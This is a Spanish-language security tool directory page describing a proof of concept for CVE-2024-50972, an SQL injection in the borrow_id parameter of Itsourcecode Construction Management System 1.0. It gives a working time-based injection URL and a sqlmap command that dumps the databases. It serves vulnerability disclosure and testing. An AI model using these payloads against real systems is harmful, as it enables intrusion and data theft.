Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-50972 — Prueba de concepto para inyección SQL en Itsourcecode Construction Management System 1.0, que demuestra inyección basada en tiempo a través del parámetro borrow_id y proporciona pasos de explotación. | Kitploit
Herramientas/GitHubGitHub/akhlak2511/cve-2024-50972
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónSeguridad de Bases de Datos
GitHubakhlak2511/cve-2024-50972

CVE-2024-50972

Prueba de concepto para inyección SQL en Itsourcecode Construction Management System 1.0, que demuestra inyección basada en tiempo a través del parámetro borrow_id y proporciona pasos de explotación.

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-50972

Descripción

Una vulnerabilidad de inyección SQL en printtool.php del Sistema de Gestión de Construcción Itsourcecode 1.0 permite a atacantes remotos ejecutar comandos SQL arbitrarios a través del parámetro borrow_id.

Tipo de Vulnerabilidad

Inyección SQL

Proveedor del Producto

Itsourcecode

Código Base del Producto Afectado:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

Componente Afectado:

El Sistema de Gestión de Construcción Itsourcecode v1.0 es vulnerable a inyección SQL a través del parámetro borrow_id en la página printtool.php

Vectores de Ataque:

  1. Configurar la aplicación localmente e iniciar sesión con las credenciales de administrador admin:admin
  • Navegar a la siguiente URL en su navegador: http://localhost/monitoring_system/printtool.php?borrow_id=5
  • Inyectar payload SQL: Modificar el parámetro borrow_id en la URL para incluir un payload de inyección SQL basado en tiempo. http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
  • Observar la respuesta de la aplicación: La página debería tardar notablemente más (20 segundos) en cargar si la inyección es exitosa, confirmando que el parámetro borrow_id es vulnerable a inyección SQL.
  • Ahora use la herramienta SQLMap para una mayor explotación y volcado de bases de datos usando el siguiente comando: sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
  • Referencia:

    1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
    2. https://owasp.org/www-community/attacks/SQL_Injection
    Descargar herramienta